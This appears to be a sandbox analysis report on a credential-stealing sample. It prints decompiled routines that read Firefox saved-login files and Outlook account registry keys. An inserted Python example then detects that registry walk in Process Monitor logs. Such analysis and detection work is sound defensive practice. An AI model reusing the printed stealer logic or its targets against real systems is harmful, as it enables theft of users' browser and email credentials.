                                                                                                                                                    				_t23 =  *_t59;
                                                                                                                                                    				_v8 = __ecx;
                                                                                                                                                    				if(_t23 != 0 && _t59[1] != 0 && _t59[2] != 0 && wcsstr(_t23, L"www.google.com") != 0) {
                                                                                                                                                    					E004021D8( &_v940);
                                                                                                                                                    					_v800 = 7;
                                                                                                                                                    					_v412 = 3;
                                                                                                                                                    					WideCharToMultiByte(0, 0, _t59[1], 0xffffffff,  &_v408, 0x7f, 0, 0);
                                                                                                                                                    					WideCharToMultiByte(0, 0, _t59[2], 0xffffffff,  &_v280, 0x7f, 0, 0);
                                                                                                                                                    					strcpy( &_v928,  &_v408);
                                                                                                                                                    					strcpy( &_v796,  &_v408);
                                                                                                                                                    					if(strchr( &_v796, 0x40) == 0 && strlen( &_v408) + 0xa < 0x7f) {
                                                                                                                                                    						sprintf( &_v796, "%s@gmail.com",  &_v408);
                                                                                                                                                    					}
                                                                                                                                                    					_t41 = strchr( &_v928, 0x40);
                                                                                                                                                    					if(_t41 != 0) {
                                                                                                                                                    						 *_t41 = 0;
                                                                                                                                                    					}
                                                                                                                                                    					E00402407( &_v940, _t76, _v8 + 0xfffff788);
                                                                                                                                                    				}
                                                                                                                                                    				return 1;
                                                                                                                                                    			}

                                                                                                                                                    0x00404288
                                                                                                                                                    0x00404293
                                                                                                                                                    0x00404296
                                                                                                                                                    0x0040429c
                                                                                                                                                    0x0040429f
                                                                                                                                                    0x004042d3
                                                                                                                                                    0x004042ee
                                                                                                                                                    0x004042fa
                                                                                                                                                    0x00404304
                                                                                                                                                    0x00404318
                                                                                                                                                    0x00404328
                                                                                                                                                    0x0040433b
                                                                                                                                                    0x00404354
                                                                                                                                                    0x0040437e
                                                                                                                                                    0x00404383
                                                                                                                                                    0x0040438f
                                                                                                                                                    0x00404398
                                                                                                                                                    0x0040439a
                                                                                                                                                    0x0040439a
                                                                                                                                                    0x004043ab
                                                                                                                                                    0x004043ab
                                                                                                                                                    0x004043b6

                                                                                                                                                    APIs
                                                                                                                                                    • wcsstr.MSVCRT ref: 004042BD
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404304
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404318
                                                                                                                                                    • strcpy.MSVCRT(?,?), ref: 00404328
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?), ref: 0040433B
                                                                                                                                                    • strchr.MSVCRT ref: 00404349
                                                                                                                                                    • strlen.MSVCRT ref: 0040435D
                                                                                                                                                    • sprintf.MSVCRT ref: 0040437E
                                                                                                                                                    • strchr.MSVCRT ref: 0040438F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
                                                                                                                                                    • String ID: %s@gmail.com$www.google.com
                                                                                                                                                    • API String ID: 1359934567-4070641962
                                                                                                                                                    • Opcode ID: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                                                                                                    • Instruction ID: 90bd0330eeb49ee3a27dc93359d6b9986b282e86ae315167fefd13048bcd18fc
                                                                                                                                                    • Opcode Fuzzy Hash: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                                                                                                    • Instruction Fuzzy Hash: 793188B290021D7FDB21D791DD81FDAB3ACDB44354F1005A7F709E2181D678AF858A58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 96%
E0040827A(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, char* _a8) {
	void _v4103;
	char _v4104;
	int _t21;
	int _t28;
	void* _t35;

	_t35 = __eflags;
	E004118A0(0x1004, __ecx);
	strcpy(0x4171b8, _a8);
	strcpy(0x4172c0, "general");
	E00407E55(_t35, "TranslatorName", 0x412466);
	E00407E55(_t35, "TranslatorURL", 0x412466);
	EnumResourceNamesA(_a4, 4, E004080A3, 0);
	EnumResourceNamesA(_a4, 5, E004080A3, 0);
	strcpy(0x4172c0, "strings");
	_t28 = 0;
	_v4104 = 0;
	memset( &_v4103, 0, 0x1000);
	do {
		_t21 = LoadStringA(_a4, _t28,  &_v4104, 0x1000);
		if(_t21 > 0) {
			_t21 = E00407EC3(_t28,  &_v4104);
		}
		_t28 = _t28 + 1;
	} while (_t28 <= 0xffff);
	 *0x4171b8 = 0;
	return _t21;
}
0x0040827a
0x00408282
0x00408292
0x004082a2
0x004082b2
0x004082bd
0x004082d8
0x004082e2
0x004082ea
0x004082f5
0x004082ff
0x00408306
0x0040830e
0x0040831a
0x00408322
0x0040832c
0x00408332
0x00408333
0x00408334
0x0040833e
0x00408347

APIs
• strcpy.MSVCRT(004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 00408292
• strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082A2
  • Part of subcall function 00407E55: memset.MSVCRT ref: 00407E7A
  • Part of subcall function 00407E55: GetPrivateProfileStringA.KERNEL32(004172C0,00000104,00412466,?,00001000,004171B8), ref: 00407E9E
  • Part of subcall function 00407E55: WritePrivateProfileStringA.KERNEL32(004172C0,?,?,004171B8), ref: 00407EB5
• EnumResourceNamesA.KERNEL32 ref: 004082D8
• EnumResourceNamesA.KERNEL32 ref: 004082E2
• strcpy.MSVCRT(004172C0,strings,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082EA
• memset.MSVCRT ref: 00408306
• LoadStringA.USER32 ref: 0040831A
  • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
• String ID: TranslatorName$TranslatorURL$general$strings
• API String ID: 1060401815-3647959541
• Opcode ID: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
• Instruction ID: d5eae57ffc3fdd8f11c9b4c351fac369e1a37aafa95eb04bb89d09d1e585c4c7
• Opcode Fuzzy Hash: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
• Instruction Fuzzy Hash: 6E1104319802543AD7212B56DC06FCB3E6DCF85B59F1040BBB708B6191C9BC9EC087AD
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 83%
E0040D1EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
	void _v267;
	char _v268;
	void* __edi;
	void* __esi;
	void* _t31;
	int _t40;
	void* _t44;
	void* _t49;
	char* _t50;
	void* _t57;
	int _t62;
	char* _t68;
	void* _t70;
	void* _t73;
	void* _t74;
	intOrPtr* _t86;
	char* _t89;
	void* _t90;
	char** _t91;

	_t86 = __eax;
	_t31 = E00406C2F(__eax + 0x1c, __eax, __eflags, _a4);
	_t94 = _t31;
	if(_t31 == 0) {
		__eflags = 0;
		return 0;
	}
	E0040462E(_t86 + 0x468);
	_t68 = _t86 + 0x158;
	E004061FF(_t68, _a4);
	_t89 = _t86 + 0x25d;
	 *_t89 = 0;
	E0040C530(_t94, _t86 + 0x18);
	if( *_t89 == 0) {
		_t62 = strlen(_t68);
		 *_t91 = "signons.txt";
		_t9 = strlen(??) + 1; // 0x1
		if(_t62 + _t9 >= 0x104) {
			 *_t89 = 0;
		} else {
			E004062AD(_t89, _t86 + 0x158, "signons.txt");
		}
	}
	_v268 = 0;
	memset( &_v267, 0, 0x104);
	_t40 = strlen(_t86 + 0x158);
	_t91[3] = "signons.sqlite";
	_t15 = strlen(??) + 1; // 0x1
	_pop(_t73);
	if(_t40 + _t15 >= 0x104) {
		_v268 = 0;
	} else {
		E004062AD( &_v268, _t86 + 0x158, "signons.sqlite");
		_pop(_t73);
	}
	_t98 =  *_t89;
	if( *_t89 != 0) {
		_t57 = E00406C2F(_t86 + 4, _t86, _t98, _t89);
		_t99 = _t57;
		if(_t57 != 0) {
			E0040C475(_t73, _t86, _t99);
		}
	}
	_t44 = E0040614B( &_v268);
	_t100 = _t44;
	_pop(_t74);
	if(_t44 != 0) {
		E0040CE28(_t74, _t100, _t86,  &_v268);
	}
	_t70 = 0;
	if( *((intOrPtr*)(_t86 + 0x474)) <= 0) {
		L19:
		return 1;
	} else {
		do {
			_t90 = E0040D438(_t70, _t86 + 0x468);
			_t24 = _t90 + 0x504; // 0x504
			_t49 = _t24;
			_push("none");
			_push(_t49);
			L004115B2();
			if(_t49 != 0) {
				_t25 = _t90 + 4; // 0x4
				_t50 = _t25;
				if( *_t50 == 0) {
					_t26 = _t90 + 0x204; // 0x204
					strcpy(_t50, _t26);
				}
				 *((intOrPtr*)( *_t86 + 4))(_t90);
			}
			_t70 = _t70 + 1;
		} while (_t70 <  *((intOrPtr*)(_t86 + 0x474)));
		goto L19;
	}
}
                                                                                                                                                    0x0040d1fb
                                                                                                                                                    0x0040d200
                                                                                                                                                    0x0040d205
                                                                                                                                                    0x0040d207
                                                                                                                                                    0x0040d371
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d371
                                                                                                                                                    0x0040d213
                                                                                                                                                    0x0040d21b
                                                                                                                                                    0x0040d223
                                                                                                                                                    0x0040d22c
                                                                                                                                                    0x0040d233
                                                                                                                                                    0x0040d236
                                                                                                                                                    0x0040d23e
                                                                                                                                                    0x0040d241
                                                                                                                                                    0x0040d248
                                                                                                                                                    0x0040d254
                                                                                                                                                    0x0040d25e
                                                                                                                                                    0x0040d277
                                                                                                                                                    0x0040d260
                                                                                                                                                    0x0040d26e
                                                                                                                                                    0x0040d274
                                                                                                                                                    0x0040d25e
                                                                                                                                                    0x0040d288
                                                                                                                                                    0x0040d28f
                                                                                                                                                    0x0040d29e
                                                                                                                                                    0x0040d2a5
                                                                                                                                                    0x0040d2b1
                                                                                                                                                    0x0040d2ba
                                                                                                                                                    0x0040d2bb
                                                                                                                                                    0x0040d2d8
                                                                                                                                                    0x0040d2bd
                                                                                                                                                    0x0040d2cf
                                                                                                                                                    0x0040d2d5
                                                                                                                                                    0x0040d2d5
                                                                                                                                                    0x0040d2df
                                                                                                                                                    0x0040d2e2
                                                                                                                                                    0x0040d2e8
                                                                                                                                                    0x0040d2ed
                                                                                                                                                    0x0040d2ef
                                                                                                                                                    0x0040d2f1
                                                                                                                                                    0x0040d2f1
                                                                                                                                                    0x0040d2ef
                                                                                                                                                    0x0040d2fd
                                                                                                                                                    0x0040d302
                                                                                                                                                    0x0040d304
                                                                                                                                                    0x0040d305
                                                                                                                                                    0x0040d30f
                                                                                                                                                    0x0040d30f
                                                                                                                                                    0x0040d314
                                                                                                                                                    0x0040d31c
                                                                                                                                                    0x0040d36c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d31e
                                                                                                                                                    0x0040d31e
                                                                                                                                                    0x0040d32b
                                                                                                                                                    0x0040d32d
                                                                                                                                                    0x0040d32d
                                                                                                                                                    0x0040d333
                                                                                                                                                    0x0040d338
                                                                                                                                                    0x0040d339
                                                                                                                                                    0x0040d342
                                                                                                                                                    0x0040d344
                                                                                                                                                    0x0040d344
                                                                                                                                                    0x0040d34a
                                                                                                                                                    0x0040d34c
                                                                                                                                                    0x0040d354
                                                                                                                                                    0x0040d35a
                                                                                                                                                    0x0040d360
                                                                                                                                                    0x0040d360
                                                                                                                                                    0x0040d363
                                                                                                                                                    0x0040d364
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d31e

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406C2F: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D205,?,?,?,?), ref: 00406C48
                                                                                                                                                      • Part of subcall function 00406C2F: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406C74
                                                                                                                                                      • Part of subcall function 0040462E: free.MSVCRT(00000000,0040BC35), ref: 00404635
                                                                                                                                                      • Part of subcall function 004061FF: strcpy.MSVCRT(?,?,0040D228,?,?,?,?,?), ref: 00406204
                                                                                                                                                      • Part of subcall function 004061FF: strrchr.MSVCRT ref: 0040620C
                                                                                                                                                      • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C551
                                                                                                                                                      • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C565
                                                                                                                                                      • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C579
                                                                                                                                                      • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C646
                                                                                                                                                      • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C6A6
                                                                                                                                                    • strlen.MSVCRT ref: 0040D241
                                                                                                                                                    • strlen.MSVCRT ref: 0040D24F
                                                                                                                                                      • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                                                                                      • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                                                                                    • memset.MSVCRT ref: 0040D28F
                                                                                                                                                    • strlen.MSVCRT ref: 0040D29E
                                                                                                                                                    • strlen.MSVCRT ref: 0040D2AC
                                                                                                                                                    • _stricmp.MSVCRT(00000504,none,?,?,?), ref: 0040D339
                                                                                                                                                    • strcpy.MSVCRT(00000004,00000204,?,?,?), ref: 0040D354
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memsetstrlen$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                                                                                                                                                    • String ID: none$signons.sqlite$signons.txt
                                                                                                                                                    • API String ID: 2681923396-1088577317
                                                                                                                                                    • Opcode ID: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                                                                                                    • Instruction ID: 747294efef189d2a86bae337d02489a359e47e35f4212505bb9232dde5c11721
                                                                                                                                                    • Opcode Fuzzy Hash: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                                                                                                    • Instruction Fuzzy Hash: 3041E3B1508246AAD710EBB1CC81BDAB798AF40305F10057FE596E21C2EB7CE9C9876D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00402C44(void* __ecx, void* __fp0, intOrPtr _a4) {
                                                                                                                                                    				void* _v8;
                                                                                                                                                    				int _v12;
                                                                                                                                                    				char _v16;
                                                                                                                                                    				char _v20;
                                                                                                                                                    				void _v275;
                                                                                                                                                    				char _v276;
                                                                                                                                                    				void _v1299;
                                                                                                                                                    				char _v1300;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t35;
                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                    				void* _t40;
                                                                                                                                                    				void* _t52;
                                                                                                                                                    				void* _t58;
                                                                                                                                                    				void* _t60;
                                                                                                                                                    				void* _t64;
                                                                                                                                                    				char* _t66;
                                                                                                                                                    				void* _t73;
                                                                                                                                                    				void* _t74;
                                                                                                                                                    				void* _t75;
                                                                                                                                                    				void* _t76;
                                                                                                                                                    				void* _t77;
                                                                                                                                                    				void* _t83;
                                                                                                                                                    
                                                                                                                                                    				_t83 = __fp0;
                                                                                                                                                    				_t64 = __ecx;
                                                                                                                                                    				_t35 = E0040EB3F(0x80000001, "Identities",  &_v8);
                                                                                                                                                    				_t74 = _t73 + 0xc;
                                                                                                                                                    				if(_t35 == 0) {
                                                                                                                                                    					_v12 = 0;
                                                                                                                                                    					_v276 = 0;
                                                                                                                                                    					memset( &_v275, 0, 0xff);
                                                                                                                                                    					_t40 = E0040EC05(_v8, 0,  &_v276);
                                                                                                                                                    					_t75 = _t74 + 0x18;
                                                                                                                                                    					if(_t40 == 0) {
                                                                                                                                                    						_t66 = "%s\\%s";
                                                                                                                                                    						do {
                                                                                                                                                    							_t69 = _a4;
                                                                                                                                                    							E0040EBC1(_t64, _v8,  &_v276, "Username", _a4 + 0xa9c, 0x7f);
                                                                                                                                                    							_v1300 = 0;
                                                                                                                                                    							memset( &_v1299, 0, 0x3ff);
                                                                                                                                                    							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Internet Account Manager\\Accounts");
                                                                                                                                                    							_t52 = E0040EB3F(_v8,  &_v1300,  &_v16);
                                                                                                                                                    							_t76 = _t75 + 0x3c;
                                                                                                                                                    							_t80 = _t52;
                                                                                                                                                    							if(_t52 == 0) {
                                                                                                                                                    								E00402BB8(_t64,  &_v16, _t80, _t83, _t69, 1);
                                                                                                                                                    							}
                                                                                                                                                    							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts");
                                                                                                                                                    							_t58 = E0040EB3F(_v8,  &_v1300,  &_v20);
                                                                                                                                                    							_t77 = _t76 + 0x1c;
                                                                                                                                                    							_t81 = _t58;
                                                                                                                                                    							if(_t58 == 0) {
                                                                                                                                                    								E00402BB8(_t64,  &_v20, _t81, _t83, _a4, 5);
                                                                                                                                                    							}
                                                                                                                                                    							_v12 = _v12 + 1;
                                                                                                                                                    							_t60 = E0040EC05(_v8, _v12,  &_v276);
                                                                                                                                                    							_t75 = _t77 + 0xc;
                                                                                                                                                    						} while (_t60 == 0);
                                                                                                                                                    					}
                                                                                                                                                    					RegCloseKey(_v8);
                                                                                                                                                    				}
                                                                                                                                                    				_t36 = _a4;
                                                                                                                                                    				 *((char*)(_t36 + 0xa9c)) = 0;
                                                                                                                                                    				return _t36;
                                                                                                                                                    			}
                                                                                                                                                     Instruction address column (detached from the code listing above during extraction): 0x00402c44 .. 0x00402d97

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                                                                    • memset.MSVCRT ref: 00402C84
                                                                                                                                                      • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402D86
                                                                                                                                                      • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                                                                                    • memset.MSVCRT ref: 00402CDE
                                                                                                                                                    • sprintf.MSVCRT ref: 00402CF7
                                                                                                                                                    • sprintf.MSVCRT ref: 00402D35
                                                                                                                                                      • Part of subcall function 00402BB8: memset.MSVCRT ref: 00402BD8
                                                                                                                                                      • Part of subcall function 00402BB8: RegCloseKey.ADVAPI32 ref: 00402C3C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                    • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                    • API String ID: 1831126014-3814494228
                                                                                                                                                    • Opcode ID: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                                                                                                                    • Instruction ID: 6c0256c292ffb55b53f7a2730c4bcad7d13cefd93b753116a94389aae211c0df
                                                                                                                                                    • Opcode Fuzzy Hash: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                                                                                                                    • Instruction Fuzzy Hash: 25315C72D0011DBADB11EA96CD46EEFB77CAF04344F0405BABA19F2091E6B49F988F54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
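The String ID above (Internet Account Manager\Accounts, OMI Account Manager\Accounts, Username) together with the RegOpenKeyExA / RegEnumKeyExA / RegCloseKey subcalls is the registry walk behind the "Tries to steal Mail credentials (via file / registry access)" signature: open the account container, enumerate its numbered account subkeys, read the credential values of each. The following is an added example, not code from the sample or from Joe Sandbox, showing how to pick that walk out of a Process Monitor CSV export and why a key-path match alone is not enough. The log lines, the process names (vbc.exe, msimn.exe, explorer.exe), the PIDs and the reader allowlist are constructed for the example.

```python
"""Detect Outlook / Outlook Express account harvesting in Process Monitor output.

Added example for this report, not code from the sample or from Joe Sandbox.
Seen from the registry side, the decompiled routine is RegOpenKey on the
account container, RegEnumKey on it, then RegQueryValue on credential values
under numbered account subkeys. SAMPLE_LOG is constructed to mimic Procmon's
CSV export columns; it is not a capture from the analysed sample.
"""
import csv
import io
from collections import defaultdict

# Account containers from the String ID above (HKCU-relative, lower-cased for matching).
MAIL_ACCOUNT_ROOTS = (
    r"software\microsoft\internet account manager\accounts",
    r"software\microsoft\office\outlook\omi account manager\accounts",
)

# "Username" is on the page; the others are the standard credential value
# names these containers use for POP3/SMTP/HTTP accounts.
CREDENTIAL_VALUES = {
    "username", "pop3 user name", "pop3 password2",
    "smtp user name", "smtp password2", "http user name", "http password2",
}

# Processes expected to read their own account store. Without this allowlist a
# mail client's normal start-up matches the same pattern as the stealer.
EXPECTED_READERS = {"msimn.exe", "outlook.exe", "wab.exe"}

# Constructed Procmon CSV: a benign explorer.exe read of Shell Folders (the
# subcall at 0040EB3F opens that key too), a legitimate msimn.exe read of its
# own accounts, and a hypothetical hollowed vbc.exe (pid 3120) doing the
# open -> enumerate -> read-credentials walk.
SAMPLE_LOG = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:00.0010","explorer.exe","1204","RegQueryValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData","SUCCESS","Type: REG_SZ"
"10:01:02.1200","msimn.exe","2876","RegOpenKey","HKCU\Software\Microsoft\Internet Account Manager\Accounts","SUCCESS","Desired Access: Read"
"10:01:02.1210","msimn.exe","2876","RegEnumKey","HKCU\Software\Microsoft\Internet Account Manager\Accounts","SUCCESS","Index: 0, Name: 00000001"
"10:01:02.1220","msimn.exe","2876","RegQueryValue","HKCU\Software\Microsoft\Internet Account Manager\Accounts\00000001\POP3 User Name","SUCCESS","Type: REG_SZ"
"10:01:05.4000","vbc.exe","3120","RegOpenKey","HKCU\Software\Microsoft\Internet Account Manager\Accounts","SUCCESS","Desired Access: Read"
"10:01:05.4010","vbc.exe","3120","RegEnumKey","HKCU\Software\Microsoft\Internet Account Manager\Accounts","SUCCESS","Index: 0, Name: 00000001"
"10:01:05.4020","vbc.exe","3120","RegQueryValue","HKCU\Software\Microsoft\Internet Account Manager\Accounts\00000001\POP3 User Name","SUCCESS","Type: REG_SZ"
"10:01:05.4030","vbc.exe","3120","RegQueryValue","HKCU\Software\Microsoft\Internet Account Manager\Accounts\00000001\POP3 Password2","SUCCESS","Type: REG_BINARY"
"10:01:05.4040","vbc.exe","3120","RegQueryValue","HKCU\Software\Microsoft\Internet Account Manager\Accounts\00000001\SMTP User Name","SUCCESS","Type: REG_SZ"
"10:01:05.4050","vbc.exe","3120","RegEnumKey","HKCU\Software\Microsoft\Internet Account Manager\Accounts","NO MORE ENTRIES","Index: 1"
"10:01:05.4060","vbc.exe","3120","RegCloseKey","HKCU\Software\Microsoft\Internet Account Manager\Accounts","SUCCESS",""
"10:01:05.4070","vbc.exe","3120","RegOpenKey","HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts","NAME NOT FOUND","Desired Access: Read"
'''


def _split_on_root(path):
    """Return (root, remainder_below_root) for a path under an account
    container, or (None, "") for anything else. Case-insensitive."""
    p = path.lower()
    for root in MAIL_ACCOUNT_ROOTS:
        idx = p.find(root)
        if idx != -1:
            return root, p[idx + len(root):]
    return None, ""


def detect_mail_credential_harvest(procmon_csv):
    """Return {(process, pid): finding} for every non-allowlisted process that
    opened a mail account container, enumerated it and read credential values
    beneath it. Each of the three steps must be seen; one alone is not enough."""
    state = defaultdict(lambda: {"opened": set(), "enumerated": set(), "values": []})
    for row in csv.DictReader(io.StringIO(procmon_csv)):
        if row["Result"] != "SUCCESS":
            continue  # a failed open (OMI key absent without Outlook) is not a read
        root, below = _split_on_root(row["Path"])
        if root is None:
            continue
        key = (row["Process Name"].lower(), int(row["PID"]))
        op = row["Operation"]
        if op == "RegOpenKey" and below == "":
            state[key]["opened"].add(root)
        elif op == "RegEnumKey" and below == "":
            state[key]["enumerated"].add(root)
        elif op == "RegQueryValue" and below.rsplit("\\", 1)[-1] in CREDENTIAL_VALUES:
            state[key]["values"].append(row["Path"])

    findings = {}
    for (proc, pid), s in state.items():
        if proc in EXPECTED_READERS:
            continue
        walked = s["opened"] & s["enumerated"]
        if walked and s["values"]:
            findings[(proc, pid)] = {
                "roots": sorted(walked),
                "credential_reads": len(s["values"]),
                "first_read": s["values"][0],
            }
    return findings


if __name__ == "__main__":
    for (proc, pid), f in detect_mail_credential_harvest(SAMPLE_LOG).items():
        print(f"{proc} pid {pid}: {f['credential_reads']} credential reads under {f['roots']}")
```

The allowlist is the caveat a practitioner needs: msimn.exe (Outlook Express) and outlook.exe issue exactly the same open/enumerate/query sequence at start-up, so the signal is the sequence coming from a process that has no business reading the store (here a hollowed vbc.exe), not the key path by itself. The Shell Folders read that precedes it (subcall 0040EB3F) is context for locating profile paths, not a detection on its own.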

                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E0040B53C(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                                                    				void* _v8;
                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                    				void* _v24;
                                                                                                                                                    				void* _v28;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				signed int _t45;
                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                    				signed int _t53;
                                                                                                                                                    				intOrPtr _t82;
                                                                                                                                                    				signed char _t86;
                                                                                                                                                    				intOrPtr _t88;
                                                                                                                                                    				intOrPtr _t90;
                                                                                                                                                    				void* _t91;
                                                                                                                                                    				void* _t92;
                                                                                                                                                    
                                                                                                                                                    				_t84 = __ecx;
                                                                                                                                                    				_t88 = _a4;
                                                                                                                                                    				_t92 = _t88 - 0x402;
                                                                                                                                                    				_t91 = __ecx;
                                                                                                                                                    				if(_t92 > 0) {
                                                                                                                                                     					_t45 = _t88 - 0x415; // 0x415 = WM_USER+0x15; the chain below also handles 0x416 and 0x41c (WM_USER+0x1c, posted from the WM_ACTIVATEAPP branch to restore focus)
                                                                                                                                                    					__eflags = _t45;
                                                                                                                                                    					if(_t45 == 0) {
                                                                                                                                                    						E0040A4C8(__ecx);
                                                                                                                                                    						L22:
                                                                                                                                                    						__eflags = 0;
                                                                                                                                                    						E0040A27F(0, _t84, _t91, 0);
                                                                                                                                                    						L23:
                                                                                                                                                    						if(_t88 ==  *((intOrPtr*)(_t91 + 0x374))) {
                                                                                                                                                    							_t81 = _a12;
                                                                                                                                                    							_t86 =  *(_a12 + 0xc);
                                                                                                                                                    							_t50 =  *((intOrPtr*)(_t91 + 0x370));
                                                                                                                                                    							if((_t86 & 0x00000008) == 0) {
                                                                                                                                                    								__eflags = _t86 & 0x00000040;
                                                                                                                                                    								if((_t86 & 0x00000040) != 0) {
                                                                                                                                                    									 *0x4171ac =  *0x4171ac & 0x00000000;
                                                                                                                                                    									__eflags =  *0x4171ac;
                                                                                                                                                    									SetFocus( *(_t50 + 0x184));
                                                                                                                                                    								}
                                                                                                                                                    							} else {
                                                                                                                                                    								E00409D7E(_t50, _t81);
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						return E004019AC(_t91, _t88, _a8, _a12);
                                                                                                                                                    					}
                                                                                                                                                    					_t53 = _t45 - 1;
                                                                                                                                                    					__eflags = _t53;
                                                                                                                                                    					if(_t53 == 0) {
                                                                                                                                                    						E0040A56C(__ecx);
                                                                                                                                                    						goto L22;
                                                                                                                                                    					}
                                                                                                                                                    					__eflags = _t53 == 6;
                                                                                                                                                    					if(_t53 == 6) {
                                                                                                                                                    						SetFocus( *(__ecx + 0x378));
                                                                                                                                                    					}
                                                                                                                                                    					goto L23;
                                                                                                                                                    				}
